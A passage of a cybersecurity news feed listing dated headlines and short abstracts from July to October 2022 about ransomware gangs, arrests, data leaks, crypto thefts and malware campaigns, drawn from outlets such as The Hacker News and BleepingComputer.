Abstract India's Central Bureau of Investigation (CBI) on Monday disclosed that it has detained a Russian national for allegedly hacking into a software platform used to conduct engineering entrance assessments in the country in 2021. "The said accused was detained by the Bureau of Immigration at Indira Gandhi International Airport, Delhi while arriving in India from Almaty, Kazakhstan," the primary investigating agency said in a press release. The name of the individual was not disclosed by the agency, but Indian news reports identified the person as Mikhail Shargin. The CBI further said that Shargin's role was uncovered as part of its investigation into alleged irregularities committed in the Joint Entrance Examination (JEE-Main) conducted last year. JEE is a standardized test used for admissions to engineering colleges in India. The September 2021 incident, per the agency, involved breaking into iLeon software, the platform on which the exam was held, with the g

The Hacker News


October 3, 2022

RansomEXX gang claims to have hacked Ferrari and leaked online internal documents Full Text

Abstract The Italian luxury sports car manufacturer Ferrari confirmed the availability of internal documents online, but said it has no evidence of a cyber attack. Documents belonging to the Italian luxury sports car manufacturer Ferrari are circulating online,...

Security Affairs


October 02, 2022

Ransomware gang leaks data stolen from LAUSD school system Full Text

Abstract The Vice Society Ransomware gang published data and documents Sunday morning that were stolen from the Los Angeles Unified School District during a cyberattack earlier this month.

BleepingComputer


October 2, 2022

Hackers set Monday deadline for LAUSD to pay up or have private data posted on dark web Full Text

Abstract A criminal syndicate has set a Monday deadline for the Los Angeles public school system to pay a ransom or have its data released on the dark web, which could potentially expose the confidential information of students and employees.

LA Times


October 2, 2022

BlackCat ransomware gang claims to have hacked US defense contractor NJVC Full Text

Abstract Another US defense contractor suffered a data breach: the BlackCat ransomware gang claims to have hacked NJVC. The ALPHV/BlackCat ransomware gang claims to have breached the IT firm NJVC, which supports the federal government and the United States Department...

Security Affairs


October 2, 2022

German police identified a gang that stole €4 million via phishing attacks Full Text

Abstract German police arrested one individual suspected of having stolen €4 million from users via large-scale phishing campaigns. Germany's Bundeskriminalamt (BKA) arrested an individual (24) suspected of having stolen €4,000,000 from internet users...

Security Affairs


October 1, 2022

Cybercriminals See Allure in BEC Attacks Over Ransomware Full Text

Abstract While published trends in ransomware attacks have been contradictory — with some firms tracking more incidents and others fewer — business email compromise (BEC) attacks continue to have proven success against organizations.

Dark Reading


September 30, 2022

Germany arrests hacker for stealing €4 million via phishing attacks Full Text

Abstract Germany's Bundeskriminalamt (BKA), the country's federal criminal police, carried out raids on the homes of three individuals yesterday suspected of orchestrating large-scale phishing campaigns that defrauded internet users of €4,000,000.

BleepingComputer


September 30, 2022

‘Disgruntled insider’ shared REvil information with researchers, helped law enforcement Full Text

Abstract The insider went on to help researchers understand the inner workings of the group that became known as REvil, whose antics and crimes made headlines after attacking beef producer JBS.

CyberScoop


September 28, 2022

Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware Full Text

Abstract A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT). "This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past," Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a Tuesday write-up. Sold on the dark web for €189 a month, Quantum Builder is a customizable tool for generating malicious shortcut files as well as HTA, ISO, and PowerShell payloads to deliver next-stage malware on the targeted machines, in this case Agent Tesla. The multi-stage attack chain starts with a spear-phishing email containing a GZIP archive attachment that includes a shortcut designed to execute PowerShell code responsible for launching a remote HTML application (HTA) using MSHTA. The phishing emails purport to be an order confirmation message from a Chinese supplier of lump and rock sugar, with the LNK file masquerading as a

The Hacker News


September 27, 2022

How Underground Groups Use Stolen Identities and Deepfakes Full Text

Abstract The growing appearance of deepfake attacks is significantly reshaping the threat landscape for organizations, financial institutions, celebrities, political figures, and even ordinary people.

Trend Micro


September 26, 2022

BlackCat Ransomware Attackers Spotted Fine-Tuning Their Malware Arsenal Full Text

Abstract The BlackCat ransomware crew has been spotted fine-tuning their malware arsenal to fly under the radar and expand their reach. "Among some of the more notable developments has been the use of a new version of the Exmatter data exfiltration tool, and the use of Eamfo, information-stealing malware that is designed to steal credentials stored by Veeam backup software," researchers from Symantec said in a new report. BlackCat, also known by the names ALPHV and Noberus, is attributed to an adversary tracked as Coreid (aka FIN7, Carbanak, or Carbon Spider) and is said to be a rebranded successor of DarkSide and BlackMatter, both of which shut shop last year following a string of high-profile attacks, including that of Colonial Pipeline. The threat actor, like other notorious ransomware groups, is known to run a ransomware-as-a-service (RaaS) operation, which involves its core developers enlisting the help of affiliates to carry out the attacks in exchange for a cut

The Hacker News


September 26, 2022

Ukraine Arrests Cybercrime Group for Selling Data of 30 Million Accounts Full Text

Abstract Ukrainian law enforcement authorities on Friday disclosed that they had "neutralized" a hacking group operating from the city of Lviv that they said acted on behalf of Russian interests. The group specialized in the sales of 30 million accounts belonging to citizens from Ukraine and the European Union on the dark web and netted a profit of $372,000 (14 million UAH) through electronic payment systems like YooMoney, Qiwi, and WebMoney that are outlawed in the country. "Their 'wholesale clients' were pro-kremlin propagandists," the Security Service of Ukraine (SSU) said in a press release. "It was them who used the received identification data of Ukrainian and foreign citizens to spread fake 'news' from the front and sow panic." The goal behind the campaign was "large-scale destabilization in multiple countries," it stated, adding the hacked accounts were used to propagate false information about the socio-political situation in U

The Hacker News


September 24, 2022

Ukraine: SSU dismantled cyber gang that stole 30 million accounts Full Text

Abstract The cyber department of Ukraine's Security Service (SSU) dismantled a gang that stole accounts of about 30 million individuals. The cyber department of Ukraine's Security Service (SSU) has taken down a group of hackers that is behind the theft of about...

Security Affairs


September 24, 2022

Colonial Pipeline ransomware group using new tactics to become more dangerous Full Text

Abstract Also known in some circles as FIN7 or Carbon Spider, Coreid is a ransomware-as-a-service (RaaS) operation that develops ransomware tools and services and then collects money from affiliates who use these tools to carry out the actual attacks.

Tech Republic


September 24, 2022

London Police Arrested 17-Year-Old Hacker Suspected of Uber and GTA 6 Breaches Full Text

Abstract The City of London Police on Friday revealed that it has arrested a 17-year-old teenager from Oxfordshire on suspicion of hacking. "On the evening of Thursday 22 September 2022, the City of London Police arrested a 17-year-old in Oxfordshire on suspicion of hacking," the agency said, adding "he remains in police custody." The department said the arrest was made as part of an investigation in partnership with the U.K. National Crime Agency's cyber crime unit. No further details about the nature of the investigation were disclosed, although it's suspected that the law enforcement action may have something to do with the recent string of high-profile hacks aimed at Uber and Rockstar Games. Both the intrusions are alleged to have been committed by the same threat actor, who goes by the name Tea Pot (aka teapotuberhacker). Uber, for its part, has pinned the breach on an attacker (or attackers) that it believes is associated with the LAPSUS$ extortion

The Hacker News


September 23, 2022

Ukraine dismantles hacker gang that stole 30 million accounts Full Text

Abstract The cyber department of Ukraine's Security Service (SSU) has taken down a group of hackers that stole accounts of about 30 million individuals and sold them on the dark web.

BleepingComputer


September 23, 2022

Multi-million dollar credit card fraud operation uncovered Full Text

Abstract A massive operation that has reportedly siphoned millions of USD from credit cards since its launch in 2019 has been exposed and is considered responsible for losses for tens of thousands of victims.

BleepingComputer


September 21, 2022

Domain shadowing becoming more popular among cybercriminals Full Text

Abstract Threat analysts at Palo Alto Networks (Unit 42) discovered that the phenomenon of 'domain shadowing' might be more prevalent than previously thought, uncovering 12,197 cases while scanning the web between April and June 2022.

BleepingComputer


September 21, 2022

Hackers stole $160 Million from Crypto market maker Wintermute Full Text

Abstract Threat actors have stolen around $160 million worth of digital assets from crypto trading firm Wintermute. Malicious actors continue to target organizations in the cryptocurrency industry, the last victim in order of time is crypto trading...

Security Affairs


September 19, 2022

TeamTNT is back and targets servers to run Bitcoin encryption solvers Full Text

Abstract AquaSec researchers observed the cybercrime gang TeamTNT hijacking servers to run a Bitcoin solver since early September. In the first week of September, AquaSec researchers identified at least three different attacks targeting their honeypots, the experts...

Security Affairs


September 19, 2022

Update: ‘Vindictive’ couple behind IHG hack deleted hotel chain data for fun Full Text

Abstract Describing themselves as a couple from Vietnam, they say they first tried a ransomware attack, then deleted large amounts of data when they were foiled. An expert says the case highlights the vindictive side of criminal hackers.

BBC


September 16, 2022

Hacker sells stolen Starbucks data of 219,000 Singapore customers Full Text

Abstract The Singapore division of Starbucks, the popular American coffeehouse chain, has admitted that it suffered a data breach incident impacting over 219,000 of its customers.

BleepingComputer


September 12, 2022

Triple Extortion Ransomware: A New Trend Among Cybercriminals Full Text

Abstract In addition to data encryption (the first layer), and the threat of leaking important data (the second layer), the cybercriminal can add another tactic of his choosing (the third layer).

Heimdal Security


September 10, 2022

Ransomware gangs switching to new intermittent encryption tactic Full Text

Abstract A growing number of ransomware groups are adopting a new tactic that helps them encrypt their victims' systems faster while reducing the chances of being detected and stopped.

BleepingComputer


September 09, 2022

U.S. Seizes Cryptocurrency Worth $30 Million Stolen by North Korean Hackers Full Text

Abstract More than $30 million worth of cryptocurrency plundered by the North Korea-linked Lazarus Group from online video game Axie Infinity has been recovered, marking the first time digital assets stolen by the threat actor have been seized. "The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized), and demonstrate that it is becoming more difficult for bad actors to successfully cash out their ill-gotten crypto gains," Erin Plante, senior director of investigations at Chainalysis, said. The development arrives more than five months after the crypto hack resulted in the theft of $620 million from the decentralized finance (DeFi) platform Ronin Network, with the attackers laundering a majority of the proceeds – amounting to $455 million – through the Ethereum-based cryptocurrency tumbler Tornado Cash. The March 2022 cryptocurrency heist resulted in losses totaling 173,600 ETH wort

The Hacker News


September 8, 2022

Ex-members of the Conti ransomware gang target Ukraine Full Text

Abstract Some members of the Conti ransomware gang were involved in financially motivated attacks targeting Ukraine from April to August 2022. Researchers from Google's Threat Analysis Group (TAG) reported that some former members of the Conti cybercrime group...

Security Affairs


September 07, 2022

Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks Full Text

Abstract Former members of the Conti cybercrime cartel have been implicated in five different campaigns targeting Ukraine from April to August 2022. The findings, which come from Google's Threat Analysis Group (TAG), build upon a prior report published in July 2022, detailing the continued cyber activity aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war. "UAC-0098 is a threat actor that historically delivered the IcedID banking trojan, leading to human-operated ransomware attacks," TAG researcher Pierre-Marc Bureau said in a report shared with The Hacker News. "The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations." UAC-0098 is believed to have functioned as an initial access broker for ransomware groups such as Quantum and Conti (aka FIN12, Gold Ulrick, or Wizard Spider), the former of which was subsumed by Conti in Apri

The Hacker News


September 06, 2022

US seizes WT1SHOP market selling credit cards, credentials, and IDs Full Text

Abstract An international law enforcement operation has seized the website and domains for WT1SHOP, a criminal marketplace that sold stolen credit cards, I.D. cards, and millions of login credentials.

BleepingComputer


September 6, 2022

Russian-speaking cyber criminals feel economic pinch Full Text

Abstract Russian-speaking cybercriminals face falling financial returns following Russia’s invasion of Ukraine, with many scams becoming redundant almost overnight due to sanctions and increased scrutiny of Russian entities, say Digital Shadows researchers.

Computer Weekly


September 6, 2022

Interpol dismantled sextortion ring in Asia Full Text

Abstract Interpol arrested 12 individuals who are suspected to be core members of a transnational sextortion ring. Interpol announced the arrest of 12 individuals suspected to be core members of a transnational sextortion ring. The arrests took place in July...

Security Affairs


September 05, 2022

Interpol dismantles sextortion ring, warns of increased attacks Full Text

Abstract A transnational sextortion ring was uncovered and dismantled following a joint investigation between Interpol's cybercrime division and police in Singapore and Hong Kong.

BleepingComputer


September 05, 2022

Ransomware Attackers Abuse Genshin Impact Anti-Cheat System to Disable Antivirus Full Text

Abstract A vulnerable anti-cheat driver for the Genshin Impact video game has been leveraged by a cybercrime actor to disable antivirus programs to facilitate the deployment of ransomware, according to findings from Trend Micro. The ransomware infection, which was triggered in the last week of July 2022, banked on the fact that the driver in question ("mhyprot2.sys") is signed with a valid certificate, thereby making it possible to circumvent privileges and terminate services associated with endpoint protection applications. Genshin Impact is a popular action role-playing game that was developed and published by Shanghai-based developer miHoYo in September 2020. The driver used in the attack chain is said to have been built in August 2020, with the existence of the flaw in the module discussed after the release of the game, and leading to exploits demonstrating the ability to kill any arbitrary process and escalate to kernel mode. The idea, in a nutshell, is to use the leg

The Hacker News


September 2, 2022

Experts link Raspberry Robin Malware to Evil Corp cybercrime gang Full Text

Abstract Researchers attribute the Raspberry Robin malware to the Russian cybercrime group known as Evil Corp. IBM Security X-Force researchers discovered similarities between a component used in the Raspberry Robin malware and a Dridex malware loader,...

Security Affairs


September 2, 2022

Terrorists relying on cybercrime for funding since Covid-19: APG Report Full Text

Abstract Terrorist groups are increasingly relying on criminal activities, including cybercrime, online fraud, and scams, to finance their illicit activities, according to the annual report of the Asia Pacific Group on Money Laundering.

The Times Of India


September 02, 2022

San Francisco 49ers: Blackbyte ransomware gang stole info of 20K people Full Text

Abstract NFL's San Francisco 49ers are mailing notification letters confirming a data breach affecting more than 20,000 individuals following a ransomware attack that hit their network earlier this year.

BleepingComputer


September 1, 2022

Ragnar Locker ransomware gang claims to have stolen data from TAP Air Portugal Full Text

Abstract The Ragnar Locker ransomware gang claims to have hacked the Portuguese state-owned flag carrier airline TAP Air Portugal and stolen customers' data. The Ragnar Locker ransomware added the Portuguese state-owned flag carrier airline TAP Air Portugal...

Security Affairs


August 31, 2022

Cybercriminals Released Mini Stealer’s Builder & Panel for Free Full Text

Abstract MiniStealer targets a wide range of applications, but it mostly targets FTP clients and Chromium-based browsers. Threat actors claim that their stealer can target different operating systems, including Windows 7, Windows 10, and Windows 11.

GB Hackers


August 30, 2022

Ukraine takes down cybercrime group hitting crypto fraud victims Full Text

Abstract The National Police of Ukraine (NPU) took down a network of call centers used by a cybercrime group focused on financial scams and targeting victims of cryptocurrency scams under the guise of helping them recover their stolen funds.

BleepingComputer


August 30, 2022

Crooks are increasingly targeting DeFi platforms to steal cryptocurrency Full Text

Abstract The U.S. FBI warns investors that crooks are increasingly exploiting security issues in Decentralized Finance (DeFi) platforms to steal cryptocurrency. The U.S. Federal Bureau of Investigation (FBI) published a Public Service Announcement (PSA) to warn...

Security Affairs


August 26, 2022

Attackers Stole Crypto from Bitcoin ATMs Full Text

Abstract Hackers abused a zero-day vulnerability in General Bytes Bitcoin ATM servers, allowing them to hijack transactions related to fund withdrawals and deposits. It's not known how many servers were attacked using the flaw and how much cryptocurrency was stolen. The ATM maker has provided steps to perfor ...

Cyware Alerts - Hacker News


August 26, 2022

Cybercrime Groups Increasingly Adopting Sliver Command-and-Control Framework Full Text

Abstract Nation-state threat actors are increasingly adopting and integrating the Sliver command-and-control (C2) framework in their intrusion campaigns as a replacement for Cobalt Strike. "Given Cobalt Strike's popularity as an attack tool, defenses against it have also improved over time," Microsoft security experts said. "Sliver thus presents an attractive alternative for actors looking for a lesser-known toolset with a low barrier for entry." Sliver, first made public in late 2019 by cybersecurity company BishopFox, is a Go-based open source C2 platform that supports user-developed extensions, custom implant generation, and other commandeering options. "A C2 framework usually includes a server that accepts connections from implants on a compromised system, and a client application that allows the C2 operators to interact with the implants and launch malicious commands," Microsoft said. Besides facilitating long-term access to infected hosts, the cross-platform kit is also known

The Hacker News


August 24, 2022

True crime shows might be the biggest educational tool for cybercrime awareness Full Text

Abstract Popular cultural depictions of fraud and cybercrime are raising awareness of the dangers posed to personally identifiable information by bad actors, according to a new study.

CSO Online


August 23, 2022

New ‘Donut Leaks’ extortion gang linked to recent ransomware attacks Full Text

Abstract A new data extortion group named 'Donut Leaks' is linked to recent cyberattacks, including those on Greek natural gas company DESFA, UK architectural firm Sheppard Robson, and multinational construction company Sando.

BleepingComputer


August 21, 2022

Hackers Stole Crypto from Bitcoin ATMs by Exploiting Zero-Day Vulnerability Full Text

Abstract Bitcoin ATM manufacturer General Bytes confirmed that it was a victim of a cyberattack that exploited a previously unknown flaw in its software to plunder cryptocurrency from its users. "The attacker was able to create an admin user remotely via CAS administrative interface via a URL call on the page that is used for the default installation on the server and creating the first administration user," the company said in an advisory last week. "This vulnerability has been present in CAS software since version 2020-12-08." It's not immediately clear how many servers were breached using this flaw and how much cryptocurrency was stolen. CAS is short for Crypto Application Server, a self-hosted product from General Bytes that enables companies to manage Bitcoin ATM (BATM) machines from a central location via a web browser on a desktop or a mobile device. The zero-day flaw, which concerned a bug in the CAS admin interface, has been mitigated in two server p

The Hacker News


August 21, 2022

Threat actors are stealing funds from General Bytes Bitcoin ATM Full Text

Abstract Threat actors have exploited a zero-day vulnerability in the General Bytes Bitcoin ATM servers to steal BTC from multiple customers. Threat actors have exploited a zero-day flaw in General Bytes Bitcoin ATM servers that allowed them to hijack transactions...

Security Affairs


August 20, 2022

TA558 cybercrime group targets hospitality and travel orgs Full Text

Abstract TA558 cybercrime group is behind a malware campaign targeting hospitality, hotel, and travel organizations in Latin America. Researchers from Proofpoint are monitoring a malware campaign conducted by a cybercrime group, tracked as TA558, that is targeting...

Security Affairs


August 20, 2022

Crypto hackers have stolen nearly $2 billion this year—Here’s why it’s a growing problem Full Text

Abstract As per a report by Chainalysis, cybercriminals have already stolen nearly $2 billion worth of cryptocurrency in 2022, which is a spike of nearly 60% compared to a year ago.

CNBC


August 19, 2022

Cybercrime Group TA558 Targeting Hospitality, Hotel, and Travel Organizations Full Text

Abstract A financially motivated cybercrime group has been linked to an ongoing wave of attacks aimed at hospitality, hotel, and travel organizations in Latin America with the goal of installing malware on compromised systems. Enterprise security firm Proofpoint, which is tracking the group under the name TA558 dating all the way back to April 2018, called it a "small crime threat actor." "Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT," the company's threat research team said in a new report. The group has been operational at a higher tempo in 2022 than usual, with intrusions mainly geared towards Portuguese and Spanish speakers in Latin America, and to a lesser extent in Western Europe and North America. Phishing campaigns mounted by the group involve sending malicious spam messages with reservation-themed lures such as hotel bookings that cont

The Hacker News


August 18, 2022

Fugitive Arrested After 3 Years on Charges Related to BEC Scheme Full Text

Abstract Using the illegally obtained personal information, conspirators would obtain counterfeit checks on behalf of their victims, along with details on the victims’ bank accounts.

Security Week


August 17, 2022

Cybercriminals Developing BugDrop Malware to Bypass Android Security Features Full Text

Abstract In a sign that malicious actors continue to find ways to work around Google Play Store security protections, researchers have spotted a previously undocumented Android dropper trojan that's currently in development. "This new malware tries to abuse devices using a novel technique, not seen before in Android malware, to spread the extremely dangerous Xenomorph banking trojan, allowing criminals to perform On-Device Fraud on victim's devices," ThreatFabric's Han Sahin said in a statement shared with The Hacker News. Dubbed BugDrop by the Dutch security firm, the dropper app is explicitly designed to defeat new features introduced in the upcoming version of Android that aim to make it difficult for malware to request Accessibility Services privileges from victims. ThreatFabric attributed the dropper to a cybercriminal group known as "Hadoken Security," which is also behind the creation and distribution of the Xenomorph and Gymdrop Android malwa

The Hacker News


August 17, 2022

BlackByte ransomware gang is back with new extortion tactics Full Text

Abstract The BlackByte ransomware is back with version 2.0 of their operation, including a new data leak site utilizing new extortion techniques borrowed from LockBit.

BleepingComputer


August 16, 2022

Clop gang targeted UK drinking water supplier South Staffordshire Water Full Text

Abstract A cyber attack disrupted the IT operations of South Staffordshire Water, a company supplying drinking water to 1.6M consumers daily. South Staffordshire Water has issued a statement confirming the security breach; the company pointed out that the attack...

Security Affairs


August 15, 2022

Ransomware Groups Refine Shakedown and Monetization Models Full Text

Abstract Ransomware-wielding attackers continue to seek new ways to maximize profits with minimal effort. Some of their top tactics include tapping initial access brokers, working with botnet operators and testing new monetization models.

Bank Info Security


August 13, 2022

US unmasks alleged Conti ransomware operative, offers $10M Full Text

Abstract The U.S. government said it will offer up to $10 million for information related to five people believed to be high-ranking members of the notorious Russia-backed Conti ransomware gang.

Tech Crunch


August 12, 2022

The US offers a $10M reward for info on the Conti ransomware gang’s members Full Text

Abstract The U.S. State Department announced a $10 million reward for information related to five individuals associated with the Conti ransomware gang. The U.S. State Department announced a $10 million reward for information on five prominent members of the Conti...

Security Affairs


August 12, 2022

U.S. Government Offers $10 Million Reward for Information on Conti Ransomware Gang Full Text

Abstract The U.S. State Department on Thursday announced a $10 million reward for information related to five individuals associated with the Conti ransomware group. The reward offer, first reported by WIRED, is also notable for the fact that it marks the first time the face of a Conti associate, known as "Target," has been unmasked. The four other associates have been referred to as "Tramp," "Dandis," "Professor," and "Reshaev." The government, besides seeking information about the five operators that could lead to their identification or location, is also calling on people to share details about Conti and its affiliated groups TrickBot and Wizard Spider. Since its rebrand from Ryuk to Conti, the transnational organized crime group has been linked to hundreds of ransomware incidents over the past two years. As of January 2022, the Russia-based ransomware-as-a-service (RaaS) operation is estimated to have hit over 1,000 entities, w

The Hacker News


August 12, 2022

Alleged Business Email Compromise Fraudsters Extradited Full Text

Abstract Three Nigerian nationals accused of participating in multimillion-dollar business email compromise fraud with a fixation on universities arrived in the United States after extradition from the United Kingdom.

Bank Info Security


August 11, 2022

US govt will pay you $10 million for info on Conti ransomware members Full Text

Abstract The U.S. State Department announced a $10 million reward today for information on five high-ranking Conti ransomware members, including showing the face of one of the members for the first time.

BleepingComputer


August 11, 2022

Conti Cybercrime Cartel Using ‘BazarCall’ Phishing Attacks as Initial Attack Vector Full Text

Abstract A trio of offshoots from the notorious Conti cybercrime cartel have resorted to the technique of call-back phishing as an initial access vector to breach targeted networks. "Three autonomous threat groups have since adopted and independently developed their own targeted phishing tactics derived from the call back phishing methodology," cybersecurity firm AdvIntel said in a Wednesday report. These targeted campaigns "substantially increased" attacks against entities in finance, technology, legal, and insurance sectors, the company added. The actors in question include Silent Ransom, Quantum, and Roy/Zeon, all of which split from Conti after the ransomware-as-a-service (RaaS) cartel orchestrated its shutdown in May 2022 following its public support for Russia in the ongoing Russo-Ukrainian conflict. The advanced social engineering tactic, also called BazaCall (aka BazarCall), came under the spotlight in 2020/2021 when it was put to use by operators of the

The Hacker News


August 10, 2022

Ransomware gangs move to ‘callback’ social engineering attacks Full Text

Abstract At least three groups split from the Conti ransomware operation have adopted BazarCall phishing tactics as the primary method to gain initial access to a victim's network.

BleepingComputer


August 10, 2022

New dark web markets claim association with criminal cartels Full Text

Abstract Several new marketplaces have appeared on the dark web, claiming to be the dedicated online portals for notorious criminal cartels from Mexico.

BleepingComputer


August 10, 2022

Conti extortion gangs behind surge of BazarCall phishing attacks Full Text

Abstract At least three groups split from the Conti ransomware operation have adopted BazarCall phishing tactics as the primary method to gain initial access to a victim's network.

BleepingComputer


August 09, 2022

How hackers are stealing credit cards from classifieds sites Full Text

Abstract A new credit card stealing campaign is underway in Singapore, snatching the payment details of sellers on classifieds sites through an elaborate phishing trick.

BleepingComputer


August 9, 2022

Morocco court in favour of extraditing French cybercrime suspect to US Full Text

Abstract French magazine L'Obs reported that the FBI suspects Raoult of belonging to the ShinyHunters hacking group, which has allegedly targeted US companies including Microsoft.

France24


August 09, 2022

Maui ransomware operation linked to North Korean ‘Andariel’ hackers Full Text

Abstract The Maui ransomware operation has been linked to the North Korean state-sponsored hacking group 'Andariel,' known for using malicious cyber activities to generate revenue and cause discord in South Korea.

BleepingComputer


August 04, 2022

Hackers try to extort survey firm QuestionPro after alleged data theft Full Text

Abstract Hackers attempted to extort the online survey platform QuestionPro after claiming to have stolen the company's database containing respondents' personal information.

BleepingComputer


August 4, 2022

Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware Full Text

Abstract Among the threat actors distributing Bumblebee is Projector Libra (aka EXOTIC LILY). It is a criminal group that uses file sharing services to distribute malware after direct email correspondence with a potential victim.

Palo Alto Networks


August 2, 2022

Hackers Stole Passwords for Accessing 140,000 Payment Terminals Full Text

Abstract Hackers had access to dashboards used to remotely manage and control thousands of credit card payment terminals manufactured by digital payments giant Wiseasy, a cybersecurity startup told TechCrunch.

Tech Crunch


August 2, 2022

LockBit 3.0 affiliate sideloads Cobalt Strike through Windows Defender Full Text

Abstract An affiliate of the LockBit 3.0 RaaS operation has been abusing the Windows Defender command-line tool to deploy Cobalt Strike payloads. During a recent investigation, SentinelOne researchers observed threat actors associated with the LockBit 3.0 ransomware-as-a-service...

Security Affairs


August 1, 2022

ALPHV/BlackCat ransomware gang claims to have stolen data from Creos Luxembourg S.A. Full Text

Abstract The ALPHV/BlackCat ransomware gang claims to have breached the European gas pipeline Creos Luxembourg S.A. The ALPHV/BlackCat ransomware gang claims to have hacked the European gas pipeline Creos Luxembourg S.A. Creos Luxembourg S.A. owns and manages...

Security Affairs


July 31, 2022

Australian Hacker Charged with Creating, Selling Spyware to Cyber Criminals Full Text

Abstract A 24-year-old Australian national has been charged for his purported role in the creation and sale of spyware for use by domestic violence perpetrators and child sex offenders. Jacob Wayne John Keen, who currently resides at Frankston, Melbourne, is said to have created the remote access trojan (RAT) when he was 15, while also administering the tool from 2013 until its shutdown in 2019 as part of a coordinated Europol-led exercise. "The Frankston man engaged with a network of individuals and sold the spyware, named Imminent Monitor (IM), to more than 14,500 individuals across 128 countries," the Australian Federal Police (AFP) alleged in a press release over the weekend. The defendant has been slapped with six counts of committing a computer offense by developing and supplying the malware, in addition to profiting off its illegal sale. Another woman, aged 42, who lives in the same home as the accused and is identified as his mother by The Guardian, has also been c

The Hacker News


July 29, 2022

Microsoft experts linked the Raspberry Robin malware to Evil Corp operation Full Text

Abstract The malware uses cmd.exe to read and execute a file stored on the infected external drive, it leverages msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file.

Security Affairs


July 29, 2022

Spanish Police Arrest 2 Nuclear Power Workers for Cyberattacking the Radiation Alert System Full Text

Abstract Spanish law enforcement officials have announced the arrest of two individuals in connection with a cyberattack on the country's radioactivity alert network (RAR), which took place between March and June 2021. The act of sabotage is said to have disabled more than one-third of the sensors that are maintained by the Directorate-General for Civil Protection and Emergencies (DGPCE) and used to monitor excessive radiation levels across the country. The reason for the attacks is unknown as yet. "The two detainees, former workers, attacked the computer system and caused the connection of the sensors to fail, reducing their detection capacity even in the environment of nuclear power plants," the Policía Nacional said. The law enforcement probe, dubbed Operation GAMMA, commenced in June 2021 in the aftermath of an attack perpetrated against the RAR network, which is a mesh of 800 gamma radiation detection sensors deployed in various parts of the country to detect surges

The Hacker News


July 28, 2022

Spain police arrested two men accused of cyber attacks on radioactivity alert network (RAR) Full Text

Abstract The Spanish police arrested two individuals accused of hacking the country's radioactivity alert network (RAR) in 2021. The Spanish police have arrested two men suspected to be the hackers behind cyberattacks that hit the country's radioactivity...

Security Affairs


July 27, 2022

Spain arrests suspected hackers who sabotaged radiation alert system Full Text

Abstract The Spanish police have announced the arrest of two hackers believed to be responsible for cyberattacks on the country's radioactivity alert network (RAR), which took place between March and June 2021.

BleepingComputer


July 26, 2022

U.S. doubles reward for tips on North Korean-backed hackers Full Text

Abstract The U.S. State Department has increased rewards paid to anyone providing information on any North Korean-sponsored threat groups' members to $10 million.

BleepingComputer


July 25, 2022

Magecart Hacks Food Ordering Systems to Steal Payment Data from Over 300 Restaurants Full Text

Abstract Three restaurant ordering platforms MenuDrive, Harbortouch, and InTouchPOS were the target of two Magecart skimming campaigns that resulted in the compromise of at least 311 restaurants. The trio of breaches has led to the theft of more than 50,000 payment card records from these infected restaurants and posted for sale on the dark web. "The online ordering platforms MenuDrive and Harbortouch were targeted by the same Magecart campaign, resulting in e-skimmer infections on 80 restaurants using MenuDrive and 74 using Harbortouch," cybersecurity firm Recorded Future revealed in a report. "InTouchPOS was targeted by a separate, unrelated Magecart campaign, resulting in e-skimmer infections on 157 restaurants using the platform." Magecart actors have a history of infecting e-commerce websites with JavaScript skimmers to steal online shoppers' payment card data, billing information, and other personally identifiable information (PII). The first set of act

The Hacker News


July 25, 2022

LockBit Ransomware Gang Claims to Have Breached the Italian Revenue Agency Full Text

Abstract The ransomware gang LockBit claims to have hacked the Italian Revenue Agency (Agenzia delle Entrate) and added the government agency to the list of victims reported on its dark web leak site.

Security Affairs


July 22, 2022

Hacker selling Twitter account data of 5.4 million users for $30k Full Text

Abstract Twitter has suffered a data breach after threat actors used a vulnerability to build a database of phone numbers and email addresses belonging to 5.4 million accounts, with the data now up for sale on a hacker forum for $30,000. 

BleepingComputer


July 21, 2022

FBI Seizes $500,000 Ransomware Payments and Crypto from North Korean Hackers Full Text

Abstract The U.S. Department of Justice (DoJ) has announced the seizure of $500,000 worth of Bitcoin from North Korean hackers who extorted digital payments from several organizations by using a new ransomware strain known as Maui. "The seized funds include ransoms paid by healthcare providers in Kansas and Colorado," the DoJ said in a press release issued Tuesday. The recovery of the bitcoin ransoms comes after the agency said it took control of two cryptocurrency accounts that were used to receive payments to the tune of $100,000 and $120,000 from the medical centers. The DoJ did not disclose where the rest of the payments originated from. "Reporting cyber incidents to law enforcement and cooperating with investigations not only protects the United States, it is also good business," said Assistant Attorney General Matthew G. Olsen of the DoJ's National Security Division. "The reimbursement to these victims of the ransom shows why it pays to work with law en

The Hacker News


July 20, 2022

Conti’s Reign of Chaos: Costa Rica in the Crosshairs Full Text

Abstract Aamir Lakhani, with FortiGuard Labs, answers the question: Why is the Conti ransomware gang targeting people and businesses in Costa Rica?

Threatpost


July 19, 2022

Extortionists target restaurants, demand money to take down bad reviews Full Text

Abstract The possibility has always existed to leave poor reviews on Google Maps and elsewhere. However, seeing fraudsters get organized and issue extortion threats alongside the review is a new development.

Malwarebytes Labs


July 18, 2022

Ransom Extortion Without Ransomware Full Text

Abstract The Luna Moth or Silent Ransom gang has been breaching organizations to filch sensitive information, threatening victims with making the files publicly available unless a ransom is paid.

Cyware Alerts - Hacker News


July 17, 2022

Crooks stole $375k from Premint NFT, it is one of the biggest NFT hacks ever Full Text

Abstract Threat actors hacked the popular NFT platform Premint NFT and stole 314 NFTs. The popular NFT platform, Premint NFT, was hacked; the threat actors compromised its official website and stole 314 NFTs. According to the experts from blockchain security...

Security Affairs


July 15, 2022

Holy Ghost ransomware operation is linked to North Korea Full Text

Abstract Microsoft researchers linked the Holy Ghost ransomware (H0lyGh0st) operation to North Korea-linked threat actors. The Microsoft Threat Intelligence Center (MSTIC) researchers linked the activity of the Holy Ghost ransomware (H0lyGh0st) operation to a North...

Security Affairs


July 14, 2022

